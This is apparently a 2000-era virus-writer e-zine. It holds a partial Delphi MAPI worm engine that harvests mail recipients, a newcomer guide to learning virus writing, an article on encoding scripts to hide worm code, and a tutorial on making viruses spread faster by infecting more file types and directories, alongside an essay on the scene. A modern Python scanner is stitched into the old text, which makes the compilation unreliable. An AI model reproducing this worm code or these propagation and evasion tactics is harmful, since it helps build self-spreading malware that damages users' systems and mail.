Evul's Introduction
Articles
MAPI Worms in C++ and Delphi HomeSlice
Viral Introduction Gigabyte
Script encoding Zulu
Some politically incorrect words about the so-called "scene" Spanska
Faster Spreading SnakeByte
AV-List SnakeByte
Are Anti-Virus Companies Criminals? SnakeByte
Some Tipz & trix for Win2k Ratter
A few ideas for viruses Kalkin/EViL
The protector scene Kalkin/EViL
Katja Kladnik (Lucky Lady) Richard Karsmakers, contributed by Al Leitch
Anti Avp Vbs I-Worms Detection [K]Alamar
Retro the easy way MidNyte
How to become the world's richest man MidNyte
An Introduction to Encryption, Part III MidNyte
Source Code
ASM
Win32.Infinite Billy Belcebu/IKX
W9x.mATRiX Lifewire/IKX
Dildo T-2000/IR
Tequila Disassembled by T-2000/IR
Bad Seed Disassembled by T-2000/IR
Win95.Yildiz Black Jack
CU.1076 Disassembled by Black Jack
Win.Tentacle_II Disassembled by Black Jack
Win32.DDoS SnakeByte
Win32.CrashOverwrite BeLiAL
One Half Disassembled by Ratter
HLL
Win32.HLLP.Scrambler.b Gigabyte
Win32.HLLP.STD Error/Team Necrosis
Win32.HLLW.Hop_Along Quilb
Batch
HighHopes.c Knowdeth/Metaphase & NoMercyVirusTeam
Fuck That 1.0a Deloss/NuKE
Binaries
Tools
E-Z Disassembler & Dumper 1.0 GzR/NuKE
Word97 VBA SR1 Generator ver 1.1k Knowdeth/Metaphase & NoMercyVirusTeam
Humor
Kevin & Kell Bill Holbrook, contributed by SnakeMan
The case of the stupid IRCop Raid
Gigabyte's Introduction
Hey there..
What is this e-zine? Well, it's mainly an overview of what's been going on in and around the VX scene the last year.
The zine is completely contribution based, as this zine is made by Coderz.net, which isn't a group. I've seen Coderz.net
grow from a fairly small website (being Evul's own homepage) to what it is now: A virus information site, hosting
several (yeah, okay, shitloads) VX homepages. Maybe this is a moment to say, thanks Evul, for the time and effort
you put into Coderz.net.
Thanks also go to:
Rajaat, Raid and The Unforgiven: For taking the time to answer the interview questions, Rajaat even in real life
(writing the answers down in his hard to read kinda handwriting :)
GriYo, Benny, mort and Ratter: For answering the questions about the meeting.. and for the great time at the meeting
itself of course :)
Roadkil: For HTML help.. and for testing my sunglasses with green and yellow letters on IRC :P
EXE-Gency and Del Armg0: For contributing another interview.
Everyone else who has contributed viruses, articles, etc.: This zine wouldn't be possible without you.
Greets:
Fuck you:
evul@coderz.net
program mapiworm;
uses
Windows, MAPI;
{$R *.RES}
(*
I'm showing the code in Delphi cause it's a bit easier to read
and looks nicer than C++. Code can easily be converted to C in
about thirty minutes, see Microsoft's MSDN section for a complete
MAPI C++ example for the syntax. A ton of code can be snipped before
inserting into your personal worm. I figure showing it in "long form"
to be nice etiquette for an article-specific program.
This code was tested on NT 4.0, but might need a revision dependent
upon your OS and how MAPI is setup. And before you laugh at 20k for
just the worm engine, I checked AVP's site for MAPI and found some
very large filesize worms doing moderately well in the wild:
I-Worm.PrettyPark: http://www.avp.ch/avpve/NewExe/win32/ppark.stm
I-Worm.ZippedFiles: http://www.avp.ch/avpve/worms/zipped.stm
I-Worm.WinExt: http://www.avp.ch/avpve/worms/WINEXT.stm
I-Worm.Plage: http://www.avp.ch/avpve/worms/Plage.stm
ReadMail example
http://support.microsoft.com/support/kb/articles/Q140/3/37.asp
*)
var
MAPIMessage: TMAPIMessage;
lppMapiMessage: PMapiMessage;
Recip, inRecip: TMapiRecipDesc;
msgFile: TMapiFileDesc;
MError: Cardinal;
MapiSession, iMinusOne, i: LongInt;
bWinNT, bFindFirst: Boolean;
ProfileName, sAddress, sProfile, sSentMail: String;
sSeedMessageID, sMessageID: array[0..512] of Char;
os: TOSVersionInfo;
begin
// Which Operating System we on?
os.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
GetVersionEx(os);
bWinNT := (os.dwPlatformId = VER_PLATFORM_WIN32_NT);
// Grab default profilename from registry
if (bWinNT) then
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
'DefaultProfile')
else
// Standard Windows
ProfileName := regReadString(HKEY_CURRENT_USER,
'Software\Microsoft\Windows Messaging Subsystem\Profiles', 'DefaultProfile');
bFindFirst := True;
// Find a message
// MapiFindNext serves as both a "findfirst/findnext" function, dependent
// upon if MessageSeed has a value
MError := MapiFindNext(MapiSession, 0, nil, @sSeedMessageID, 0, 0, @sMessageID);
if (MError = SUCCESS_SUCCESS) then
begin
// Obtain the long pointer
lppMapiMessage := @MAPIMessage;
// Open for Reading, headers only (both faster, and avoids
// writing all the god damned attachments to temp directory)
MError := MAPIReadMail(MAPISession, 0, @sMessageID,
MAPI_ENVELOPE_ONLY, 0, lppMapiMessage);
if (MError = SUCCESS_SUCCESS) and (lppMapiMessage.lpRecips <> nil) then
begin
Before I start, I will explain some words. You will probably not only see these words in Viral Introduction, you might
see them in the rest of the zine as well.
VX: Virus eXchanging. VXers are those who are pro-virus, collect viruses, write them, exchange them..
AV: Anti Virus. They make virus scanners. Examples are: Anti Viral Toolkit Pro, Norton Antivirus, McAfee...
IRC: Internet Relay Chat. People use it to chat, to communicate. There are many different IRC servers, Undernet for
example.
IRC client: What people use to connect to an IRC server. Examples are: mIRC, PIRCH, Xircon, VIRC..
ASM: Assembly language. This is the language most viruses are coded in.
TASM: Turbo Assembler. This is most used in the VX scene to assemble ASM source code into executable files.
(Requires TLINK)
VBA: Visual Basic for Applications. It's a part of the Microsoft Office products.
VBS: Visual Basic Scripting language. Can be inside an HTML page. (For more information see the part about script
viruses in "What is:", further down in this document.)
Well, I think I should give you some links to virus sites to begin with. Your first stop for finding any VX site should
be coderz.net. Check the "Hosted pages" part, you'll find many interesting sites on coderz.net, and they might contain
other links to VX sites elsewhere.
Coderz.net
29A
#virus Homepage
Virus Trading Center
Tally's Virus Link Reference
If you're looking for IRC channels about viruses, you could come to #vir and #virus on Undernet. Watch out: NEVER
ask or beg for viruses, you'll get kicked out. And DON'T TURN THE CAPS LOCK ON LIKE THIS, it's annoying,
and it looks like you're yelling all the time, or you'll get kicked out. Viruses can be found on the net, if you put in a bit
of effort. If you can’t be bothered, or haven’t got the intelligence to find even a few, then you’re not likely to be helped
out. People in the scene will gladly help you out if you put in the effort first to prove you’re not just going to infect
someone’s computer. They need to know you’re interested in learning.
Mainly in Assembler (ASM), but there are also macro-viruses, which are made in Visual Basic for Applications
(VBA). VBA is a part of the Microsoft Office products. There are viruses that are written in other languages, but
they're a rarity. A newer option is VBS, a scripting language that can be used for making worms or viruses.
If you wanna learn how to write viruses, you might want to read a tutorial. There are some tutorials in VDAT, for
example. VDAT contains a lot of information about viruses, VXers, VX groups and also tutorials about how to write
viruses. You can find answers to all kinds of virus-related questions in VDAT, you can find some VX history, etc. One
warning about VDAT though: it’s currently nearly 10Mb and can take a long time to download. It is definitely worth it
though. Also, yes it is an exe, yes it is made by someone interested in viruses, but NO, it is not a trojan as I have been
asked before. If you were going to write a trojan, would you make it 10Mb? I guess you’ll have to trust me on that :)
Coderz.net's FTP
Codebreakers
or
Coderz.net's FTP
Don't be discouraged when you start out coding, once you get the hang of the simple parts you can go at your own
pace with the rest.
Which words should you search for when looking for viruses or information about viruses?
Search for: virus, viruses, virii, VX, computervirus. The best search engine to use is http://www.hotbot.com for an
exact match. This can be useful when the URLs of virus sites I gave you are down.
You can meet VXers on IRC. Try #vir and #virus on Undernet. Read some tutorials (see "How to learn how to code
viruses?"). Have some patience. You have to get to know the people and they have to get to know you. And learning
how to code viruses might also take some time. If you have questions, first look if you can find the answer in VDAT
before asking. Start with the first tutorial, not with the last. Don't go to the next until you've finished.
Is it illegal?
That depends on the country you live in. Usually writing viruses isn't illegal, exchanging isn't illegal either, but
spreading is. So if you send someone a virus without informing the person that it's a virus, that would be considered
spreading. Always check your country’s laws before doing anything virus-related. Governments don’t generally
understand you can be interested in a virus without needing to spread it, if you have a virus they assume you intend to
spread it.
There can be many reasons: challenge, fame, buck authority, they want to do something different..
What is:
an overwriter: A virus that completely overwrites files to infect them, so it doesn't save the original file. This is what
you start with when you learn to code viruses. The host file is completely destroyed, so the virus is noticed almost
immediately. Have a look at Codebreakers magazine #1, or SLAM magazine #2.
an appender: A virus that saves the parts of the infected file that are changed, then writes itself to the end of the host
program. At the end of the virus is some code to restore the program (in memory only) and run it. Because the host
program still works, your virus has a better chance of going unnoticed than an overwriter. This is explained in
Codebreakers magazine #2 or SLAM magazine #3.
a prepender: A prepending virus will write itself to the start of a program instead of the end. This has the advantage
of not requiring a calculation called the ‘delta offset’. Don’t worry about this yet, the tutorials will explain it when you
get there; I just mention it so you know that there is a difference between a prepender and an appender.
encryption: Encryption is a way to hide the true function of your virus code, and any messages contained in it. An
encrypted virus has a decryptor at the start that decrypts the rest of it, then passes control to the now unencrypted part.
polymorphism: A virus that creates a completely different decryptor every time, so the AV is unable to make a
scan-string for the virus.
TSR: A virus that stays resident in memory. This can be particularly effective, because any program even listed in a
‘DIR’ command can be infected by a TSR virus.
bootsector: A bootsector is the part of the disk that is read automatically when the computer starts and loads the
operating system. A virus that infects here can load before the operating system, and therefore before any AV program
can be installed in memory.
a macro-virus: Infects MS Office documents, is written in VBA. An example is the Melissa virus.
a script virus: A virus made in JavaScript or VBS. Those languages can be used inside an HTML page, so the virus
can be inside the HTML page. That's why they're sometimes called HTML viruses. VBS is also called 'Winscript'.
Scripting languages are also good to make worms in. An example is Bubbleboy.
Have patience.. I hope, after you have read Viral Introduction, you've found the information you were looking for,
know where to look for tutorials and virus sites and that you know what the VX scene is.
Good luck,
Gigabyte
Thanks a lot to MidNyte, for all the help with the article and suggestions, and to Spyda for the 'Viral Introduction'
picture.
Script encoding
09/09/2000
Hi all.
First, when reading this, consider that English is not my native language, so expect some mistakes in the text. :)
I was going to submit my last worm for the zine, but well, instead of that I decided to write some things about
encoded scripts (JScript/VBScript) and only use that worm as an example. By this I mean Microsoft's encoding,
not other manual ways of encoding or making your code harder to read.
So this is my first article for a zine; most of my viruses/worms were included in many, but just that, not real articles
or tutorials.
Script encoding started with Internet Explorer 5. At that time it was possible to use the "<script>" tag of HTML files
to write scripts in JavaScript, JScript or VBScript, but this version added new values for the "language" property of
that tag; those values were "JScript.Encode" and "VBScript.Encode".
Examples:
<script language="JScript.Encode">
<script language="VBScript.Encode">
I said that Internet Explorer 5 started this because it included version 5 of both JScript and VBScript, which are the
ones that included this new feature.
For encoding your script you need Script Encoder, which is available from http://msdn.microsoft.com/scripting. This
Win32 command line program will read your HTML file with a script tag having "VBScript" as its "language" value
and it will write a new HTML file with your code encoded and with the "language" attribute changed to
"VBScript.Encode". The same happens when using JScript.
For example, something like this:
<script language="VBScript">
MsgBox "Example"
</script>
<script language="VBScript.Encode">#@~^GgAAAA==@#@&P~t/TAWXPr36m:2VJ@#@&7gUAAA==^#~@</script>
Bear in mind that this encoding is really only designed to stop casual readers of your code; the truth is that it's trivial and will
not protect your code from anyone determined to view it.
Of course, these things are only supported in Internet Explorer, not in other browsers. Script languages are not
part of the HTML language; not even the "language" attribute is part of HTML 4, the correct attribute would be
"type", but well, that is another matter that is not virus related.
At the time of writing this I know only one virus using this feature in HTML files, HTML.Lanus, which I wrote some time
ago. Anyway, I explained script encoding in HTML files to show how it was possible, but as we know, HTML files
are not a real target for viruses since scripting in them needs authorization from the user when using most of the needed
objects, unless we are using some kind of bug to skip the warning message.
Windows Scripting Host 1 (also known as WSH in this text) was included for the first time in Windows 98. It
supported JS (JScript) and VBS (VBScript) files to do scripting, and with this, a new type of viruses was started by
Lord Natas. No encoding was possible.
Some time later Windows Scripting Host changed its name to Windows Script Host and version 2 was out. One of the
things that this new version added was the possibility of encoding our scripts, like it was possible with HTML files, by
using two new extensions, JSE and VBE.
JSE are JS files after using the encoder, the same happens with VBE and VBS.
Using the encoder with JS and VBS files is the same as with HTML files: it reads a VBS file with our script and it
creates a VBE file which has our encoded script.
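A defensive triage scanner for the markers this section describes, added here as an example (it is not Zulu's code nor part of Microsoft's Script Encoder): it finds the "#@~^ ... ^#~@" envelope, reads the 8-character base64 length field after the opening marker, and flags the ".Encode" language values and the JSE/VBE extensions, without decoding anything. The envelope layout (length field, body, checksum field) is an assumption inferred from the sample above, and the file names and inputs are constructed.

```python
"""Triage scanner for the Microsoft Script Encoder markers described above.

Constructed example: it locates the "#@~^ ... ^#~@" envelope, reads the
8-character base64 length field that follows the opening marker, and flags the
"*.Encode" language values and the JSE/VBE extensions.  It never decodes the
payload; it only reports where encoded blocks are and what their header claims.
"""
import base64
import re
import struct

START = "#@~^"
END = "^#~@"
# Attribute values introduced with JScript/VBScript 5 (Internet Explorer 5).
ENCODED_LANGUAGES = ("JScript.Encode", "VBScript.Encode")
# Extensions introduced with Windows Script Host 2 for encoded JS/VBS files.
ENCODED_EXTENSIONS = (".jse", ".vbe")

LANG_RE = re.compile(r'<script\b[^>]*\blanguage\s*=\s*"([^"]+)"', re.IGNORECASE)


def _field(text8):
    """Decode an 8-char base64 field (6 data chars + "==") as a little-endian uint32."""
    return struct.unpack("<I", base64.b64decode(text8))[0]


def find_encoded_blocks(data):
    """Return one dict per envelope found in data, in file order.

    Assumed layout (inferred from the sample on this page): 8-char length field,
    encoded body, 8-char checksum field.  The article does not say what the
    length counts, so it is reported beside the measured body length, not enforced.
    """
    blocks = []
    pos = 0
    while True:
        start = data.find(START, pos)
        if start < 0:
            return blocks
        end = data.find(END, start + len(START))
        if end < 0:
            # Opening marker without a closing one: truncated or tampered block.
            blocks.append({"offset": start, "complete": False})
            return blocks
        inner = data[start + len(START):end]
        block = {"offset": start, "complete": len(inner) >= 16}
        if block["complete"]:
            try:
                block["declared_length"] = _field(inner[:8])
                block["checksum_field"] = _field(inner[-8:])
                block["body_length"] = len(inner) - 16
            except (ValueError, struct.error):
                # Header or trailer is not the 4-byte base64 field we expect.
                block["complete"] = False
        blocks.append(block)
        pos = end + len(END)


def scan(filename, data):
    """Summarise the script-encoding indicators in one file as a dict."""
    lower = filename.lower()
    langs = [m.group(1) for m in LANG_RE.finditer(data)]
    encode_langs = [lang for lang in langs if lang in ENCODED_LANGUAGES]
    blocks = find_encoded_blocks(data)
    return {
        "encoded_extension": lower.endswith(ENCODED_EXTENSIONS),
        "encode_languages": encode_langs,
        "blocks": blocks,
        # Any one indicator is enough to pull the file aside for a closer look.
        "suspicious": bool(blocks or encode_langs or lower.endswith(ENCODED_EXTENSIONS)),
    }


# Constructed samples; the first is the encoded <script> block shown in the article.
SAMPLE_ENCODED_BODY = "@#@&P~t/TAWXPr36m:2VJ@#@&"
SAMPLE_HTML = ('<script language="VBScript.Encode">#@~^GgAAAA=='
               + SAMPLE_ENCODED_BODY + '7gUAAA==^#~@</script>')
SAMPLE_PLAIN = '<script language="VBScript">\nMsgBox "Example"\n</script>'
SAMPLE_TRUNCATED = "#@~^GgAAAA==@#@&P~t/TAW"

if __name__ == "__main__":
    for name, body in (("page.htm", SAMPLE_HTML), ("plain.htm", SAMPLE_PLAIN),
                       ("cut.vbe", SAMPLE_TRUNCATED)):
        print(name, scan(name, body))
```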
NETWORK/OUTLOOK.FakeHoax
NETWORK/OUTLOOK.FakeHoax is an example of script encoding in Windows Script Host. It is the first virus/worm
using the JSE and VBE extensions (at least, the first using them for more than auxiliary files), so it has two versions, one in JScript and the other in
VBScript.
It uses OUTLOOK and the network shares for spreading. The main code is a COM object written in XML and
VBScript using Windows Script Component, so the code in the JSE and VBE file is trivial. Both versions create a
WSC file (the COM object defined in XML) and then both call methods and change properties of that object, no real
spreading code is in those files.
The worm was written in this way to make it easier to port it to any other language; this way I was able to create a
JSE and a VBE file without really porting the main code. Also, it's possible to create new versions using Delphi,
Visual C++, or any other by using "REGSVR32.EXE" to register the WSC file as a COM object before calling its
methods or changing its properties.
This worm was written to show how JSE and VBE files could be used in viruses/worms, since before this they
were only used as auxiliary files (some versions of HTML.rahC by 1nternal and OUTLOOK.Monopoly by me, for
example). Besides, since it needs Windows Script Host 2 or later, it won't spread well at the time of
writing this.
Also, this was a good opportunity for using Windows Script Component for the first time, because it made it possible
to write a JScript and a VBScript version without needing to port the whole code, so this is also the first virus/worm
using its own COM object.
When writing viruses you must know on which systems your code will work. Even though script encoding is not new, it
was not a valid feature for viruses since not many systems supported it. But this is changing these days, and
encoding is now possible for a worm with good spreading capabilities.
Script encoding in HTML files: supported in any system with JScript/VBScript 5+ (included in Internet Explorer 5+).
JSE and VBE files: supported in any system with Windows Script Host 2+ (included in Windows 98 SE, Windows
2000 and Windows Me).
Also, JScript/VBScript 5+ and Windows Script Host 2+ can be installed as separate packages. For example, an
encoded script in an HTML file could be run in Internet Explorer 4 if the JScript/VBScript 5+ separate package is
installed.
Trick to run JSE and VBE files in systems with WSH version 1
By using a trick I found, JSE and VBE files can be run in systems with WSH version 1 instead of version 2 if
JScript/VBScript 5+ is installed.
Let's see an example, a system has Windows 98 (not Windows 98 SE) and Internet Explorer 5 installed. WSH 2+
separate package was not installed.
So this system has WSH 1 and JScript/VBScript 5, since WSH 1 was included with that Windows version (unless it
was not selected in a custom installation) and JScript/VBScript 5 was included with Internet Explorer 5.
This system is able to understand encoded scripts; it just doesn't have the JSE and VBE extension support. So to
run a JSE or VBE file we can create a WSH file that calls the encoded script.
This means that instead of running a VBE file directly (not possible in the example), we can run a WSH file (which
is supported in WSH 1) that runs a VBE file.
This method was used in OUTLOOK.Monopoly: the worm was a VBS file that created a WSH and a VBE file and
then ran the WSH file, so the main code was encoded and it worked in the first edition of Windows 98 with Internet
Explorer 5 installed. WSH 2+ was not needed in this worm.
I won't explain how WSH files work; to know more about them, create a JS file and then view its properties,
changing some of them will create a WSH file in that same directory. Then view it and play with those values. :)
Script encoding can be used in any file format that accepts the "<script>" tag. However, some file formats like WSC
and WSF are not supported by the current version of Script Encoder, but you can include encoding in those file
types by creating the "<script>" tag in an HTML file and then copying the encoded code to the WSC or WSF file.
The extensions recognized by Script Encoder are ASA, ASP, CDX, HTM, HTML, JS, SCT and VBS.
You can use this feature in HTML viruses/worms, even though they are not very interesting, or you may use
it in worms in JSE or VBE format, which are the better methods.
Normal viruses in JSE and VBE format are not interesting since it would be like JS and VBS viruses: there are not
many files to infect since they are not used much by people, well, maybe you can find lots of them on my computer
since I'm so crazy about scripting and I use it for lots of simple tasks, but most users don't use WSH. :)
Also, encoding won't make a file simple to infect, since it would be necessary to decode it, infect it and then encode
it again.
These days there are a lot of worms in VBS files (the same is not true of JScript ones); well, all these worms
could be easily encoded.
Well, that's all; let me know about any technical errors you find or any question you have.
Bye all.
Zulu
zulu_vx@techie.com
http://coderz.net/zulu
Some politically incorrect words about the so-called "scene"
- Ethnographic introduction
Virus writers and all people classified globally under the "Vx" label are an interesting
population to observe. Especially if you can have a look from the inside, and, at the
same time, if you're not involved enough, in order to be able to see the "scene" from an
independent and exterior point of view. I think I qualify here. I've been around for a few
years, met some coders in real life, wrote some viruses, but at the same time I was never
a member of any group, I'm old enough to be able, I hope, to think with some distance,
and these last months I basically had better things to do than to write code.
- Don't ask "How much time you spend on IRC?", but ask "Show me your code!"
The main problem of the "scene" can be spelled in three letters: IRC. I'm impressed to
see how people spend so much time chatting about everything except virus coding
techniques. They think that to be a real virus writer, you need to be accepted in some
virus channel, and then spend twelve hours a day there. High doses of IRC induce a
sort of twist in reality perception, because people behave there very differently from real
life. How many people have we seen, and will we see, very proud of their brand new op,
kicking, banning, laughing about infected users, acting as some powerful aggressive elite.
Even if they never produced one single line of code. Even if they never did anything
useful for the Vx community. Even if their only production is a twenty line macro-virus.
Even if they have to go to school the day after, where they will not be "DarkLordz" or
"KillerGod" anymore, but normal average teens who have to do their homework. If you
think you're a mature person, and I guess most of us are, behave as a mature person
even on IRC.
You may think I exaggerate when I talk about this twist of reality. Unfortunately, I can
cite lots of examples. Let's take one that everybody heard about. This coder, no need to
tell his nickname, according to his own words, sent logs to some anti-virus people
showing that another coder was actively spreading viruses, to "protect one or two
channels from being deleted by Undernet". Basically, that means that the existence of
IRC channels is more important than a real person's life. Because, unfortunately,
nowadays, spreading viruses can lead directly to some years in jail, depending on the
laws in your country. Which means a destroyed life. Just to "save a channel". You see
the twist. I'm pretty sure now the guy in question recognizes the big error he made, and
I hope he learnt from that, but anyway, it's too late.
This example was of course a bit unique in its importance. But it's typical of a state of
mind very widespread in the Vx community. People think an op is the most important
thing in life. They think their rank level in the channel's bot is the only important thing,
proportional to their eliteness. Twist again. Importantly, this changes the
communication and the behaviour between people. Who is going to criticize the owners
of their favourite channels? Or more generally, people with a higher level? This leads to
hypocrisy, which is very widespread in the community.
I saw too many examples of guys and girls spending so much time on IRC that
everything that happened there, even the most anecdotal fights, took on a huge
importance. Let me tell you: if you need a computer and to be connected to feel human
emotions like pain, anger, friendship or love, there is something wrong. Really.
IRC has another problem. It's dangerous. It seems that Vx people never learnt the
lessons from the Melissa case. They don't care about encryption, they don't care about
remailers, they don't care that what they say on-line can be used to profile or trace
themselves or, even more importantly, some of their friends. They keep megabytes of
sensitive IRC logs and old mails. They just don't care until the worst happens. Virus
writing and spreading is no longer a fun game. It's a dangerous criminal activity, and
you have to take this fact into account, especially if you spread your viruses, or have
friends who do that. This is the main revolution in Vx Land these recent years. Now
they are seriously after us. And nobody cares.
- Vxers as crickets
Let's talk about another interesting behaviour in the Vx scene: the flocking in groups.
It's funny how people who repeat so often that they are independent, or think
different, do everything possible to join or create some clan with similar people, and
then be proudly tagged as a member of a larger entity known as a Vx group, with its
own set of new rules and laws they have to conform to. Like sheep. The analogy is not
here just as a cheap provocation. It's a very old animal behaviour. Individuals are weak;
if they flock, they are stronger against all possible enemies. Or at least they feel
stronger. Crickets are a good example. Whenever they form a very large group, their
behaviour changes completely and they become much more aggressive. They are no longer
afraid of predators. It's very funny to see the same kind of basic animal regression in
Vx crowds.
Or maybe it's just to get some form of recognition. People with no skill, or people
afraid to learn (because we were all lamers at day zero, we should not forget that) know
that they will never be accepted in the community for their own merits. So they need a
sort of official tag to prove to others and maybe even more to themselves that they are
part of the Vx scene. This mark is provided by membership in some group, which
provides an easy and quick official entrance ticket into the scene. No need to produce
anything useful, now. You are already inside the community, even by a totally artificial
way.
Here again, examples are numerous. Was it one year ago that a new mainly English-based
group appeared, totally over-hyped, with every newcomer wanting to join?
They did nothing, most of their members were just plain unknown, but you couldn't
miss their presence on IRC. Everybody laughed at them, but nobody told them directly
that they were totally ridiculous, for example with their "public relation department"
(more on that later), and other really laughable things. Yet, again, IRC was the main
"scene" participation. Where is the code? I think now this group returned to the dust it
appeared from, but who really cares? I remember too these ridiculous but finally
rewarded ass-licking efforts by a coder (who is a cool and very intelligent guy, but
anyway) to join a high-profile group. Once he was at last able to glue this well-known
tag to his nickname, he reached his goal, and just disappeared. He never coded
anything else.
People sometimes tell me: "being a member of a group is a good way to get motivated". If you
need to be motivated or gently forced to be a vxer, it would be a better idea to spend
your time fishing, or doing something you don't need to be motivated for. Forget for a
moment the question "how to be a vxer" (and basically, if you still don't know the
answer, it's time to return to your stamp collection), but ask yourself the more important
question: why do you want to be a Vxer? For the hype? Because it's cool? Because
people will fear you? Because you want to satisfy your ego? Because you want to
impress your girlfriend or your mom? Because you're looking for on-line friends? Or
just because you are curious, you want to code and learn some new knowledge?
Another strong criticism and clear sign of immaturity that comes to mind. Most Vxers
are not able to argue with people from the two other sides of the virus triangle: anti-virus
people and infected users. There is a good place for that: alt.comp.virus on Usenet.
A mainly anti-virus group nowadays, unfortunately, with some uninteresting parrots,
but anyway, the only place where you can directly and publicly discuss with members
of the anti-virus industry. They have their share of big hypocrisy, ego, closed minds, of
course, but I'm not talking about them right now. These guys, and some of them are
very smart, have a lot of tough arguments to oppose to us. The easy way, used by most
Vx people, is not to participate in this group, and avoid any kind of discussion. Or
just to pop up there once, insult everybody, and jump back to their hole. What does it
mean? Easy: virus writers are not open-minded enough to quietly discuss with people
opposing them, listen and contradict some opposite argumentation. Or maybe they are
not smart and mature enough to engage in an adult discussion. It is kind of funny
because Vx often ask for people to be open-minded about virus writing activities.
Instead of bashing the largely beloved Nick Fitzgerald on IRC, where he is not, what
about trying to argue against him publicly in the newsgroup? Of course, it may be a
bit tougher, due to his rhetorical skills.
Some vx people told me that they don't participate in this forum because it's a mainly
AV group. Think a bit more about this argument. It's kind of recursive, a bit like
an infinite loop, to use coding terms. It looks like a self-fulfilling prophecy. In other
words, it's plain stupid.
- Ego scene
I could talk more about the grossly over-inflated ego of most of us (me included), but
my hour of reflection is over. Anyway, just as an example, I always find funny the
dramatic and emphatic farewells from people leaving the "scene", although they
generally never produced anything noticeable, texts apparently always written with
some emotion. If you want to leave, just disappear silently and return to where you
came from, nobody will notice anyway, keep contacts if you want, and don't bother
people with your ridiculous tears in the eyes and other "official" retirement. The day
you decided to become a vxer, you didn't issue a public statement "People, listen to me,
today I officially join the vx scene!". So, do the same when you leave. Every other way
to stop is just a desperate and childish call for attention, from people who didn't
receive enough of it for their production during their career, an ultimate try to turn
people's eyes in their direction for one or two minutes. This impression is even worsened
when the guy gives, as a reason, "there is too much shit in the scene these days", or
something like that. That clearly means that they were not here to code and to learn.
They probably needed to be accepted in whatever community to find some other people
to talk with. What about the Barbie doll collector scene? Now that I think about it, the
ultimate case of lameness is the guy who declares everywhere that he quits, and is
actually still around. Not even able to follow his own words.
Another example, linked with the group problem. It seems that some people create a
group for the sole excitement of becoming a boss, being able to recruit people, command
them, and fire them if needed. People always need to find other people even more lame
than them to enhance themselves, it's an eternal law of human beings. Same
mechanism of false and artificial feeling of power as on IRC. It's "my" group, "my"
board, "my" zine, "my" channel, and there I am the king. More generally, a rigid
hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the
best groups around have no hierarchy at all. Maybe one guy who centralizes the
material for the zine, and that's all. Every attempt to mimic the real world (a company
for example, with different departments) is condemned to be considered as extremely
lame and poorly productive; and I won't even talk about the irony of seeing newcomers in
the underground trying very quickly to imitate the mechanisms of the normal world.
Didn't you come into the vx world in part because it looked different?
That's why everybody laugh when a group creates this peak of extreme ridiculousness,
a "Public Relation" department. It's clearly a way to admit "we have nothing to say, but
anyway, there is a guy in charge of that". It's a way to show to everybody your
nombrilist and egocentric view of the scene, because you think every journalist around
is going to be interested by your new group, you will be submerged by interview
requests, users will ask you about your viruses, you will do the first page of the New
York Times. In your dreams.
- Delicate conclusion
I sometimes think that the Vx scene is mainly composed of boring IRC teens, who don't
really know what life (I mean real life) is all about, who are not interested in
learning, but in posing as some elite lordz of Darkness. It may be partially true, or
partially wrong, depending on how you look at it. Anyway, I don't really care. A minority
of people are interesting enough, as human beings, or coders, or both, and that's the
only important thing, at least for me. I don't care about all the microscopic IRC wars,
the anecdotal group fights, the childish aggressiveness. Maybe that's because I'm a bit old,
but I think I've learned how to filter important things from the background noise. And
not just in the Vx world. Try to do the same, you will see, life is easier.
- Epilogue
People involved in the virus community - I don't like the word "scene", this is not a
theater, and there is nobody looking at us, another nombrilist deformation of reality,
even in the terms used - always say that it's worsening as the years pass. More and
more script kiddies and fewer and fewer die-hard asm coders who can spend six hours on a
routine just to optimize it by saving two bytes. I don't think it's true. The problem being
that people cannot separate their personal history from the global picture (that's not
limited to the Vx world, of course). If you try to look at it with some distance, you will
see that the vx community looks the same as five or ten years ago. Not in terms of
techniques used, of course, but in terms of personalities. New people pop in, old people
quit, in an eternal cycle. In these two extreme populations, and in the large group of
active vxers which sits in the middle, the proportion between posers who are just driven
by an ego trip (ph33r M3!), and the really interesting guys who want to discover new
techniques or possibilities, even through a long learning process, yes, this proportion
always stays the same through the years. You have stupid old schoolers and stupid
newbies who think they are Elvis, and you have interesting old schoolers and interesting
newbies who want to learn, always. If you're reading this and you think you are part of
the "scene", just think about which category you fit best. But be aware that the image
you have of yourself may not be the image that your vxer colleagues have of you. If
you're not satisfied with it, think about what you can do to change it and maybe to gain
some respect. I'm not talking just about improving your technical skills. Some
people try to be creative with their limited knowledge (me, for example), others run
websites, publish useful databases, are active collectors, help newcomers by writing
tutorials, code other things than pure viruses, whatever. You can, at last, improve
your behaviour when interacting with other people. In other words: try to be mature.
PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.
[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]
http://kickme.to/Cryptic/
fly.to/alpina
Faster Spreading
or
What to include in your virus to make it spread more effective
by SnakeByte [SnakeByte@kryptocrew.de]
Here we go, please notice that it is illegal to spread viruses, and all
this information is completely theoretical, or for testing purposes
in a controlled environment.
I have written just one Windows virus so far, so you will see only a few
lines of code here.. ( interesting ones I think, but maybe not very optimized ;)
Ok, when a virus arrives on a clean system, it will infect some files, sure .. ;)
But if something goes wrong, we just get some infected files in the current directory
and the victim deletes them, because he does not like the infected app.. :(
If you are a macro coder, you should try to infect as many document types which
support macros as possible ( DOC, CDR, DOT, PPT, XLS.. ).
Same for the assembler coders, there are a lot of file formats which can
be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD.
Maybe you should try to code a hybrid which is able to infect binaries on
the one hand and macros on the other hand, this will offer you a much higher
chance of finding files for infection. In VDat there is a description of how
to infect most file types. I think adding 200-400 bytes to your virus and
being able to infect another type is a very good deal. The more files you
infect, the more likely you get your virus around.
Ok, now we infect a lot of files, but still all are in the same directory,
so we need to change and parse directories. What we should infect nearly
always are the Windows and the system directories, because they include a lot
of files which are highly used. Use the GetWindowsDirectory and GetSystemDirectory
APIs to retrieve their names. Then you should parse directories to find more
files to infect. Otherwise we would have infected the current, the win and sys
directory, but nothing else, which is not very useful ( how often do you dcc a
friend your calc.exe ? *g* ) There are two ways of directory parsing, the one
is upwards the other downwards. If you travel downwards ( like cd.. in dos ), you
would normally not find a lot of files, so travelling upwards is recommended.
This can be simply done with a FindFirstFile / FindNextFile loop.
The current directory is assumed to be the root of one of the drives.
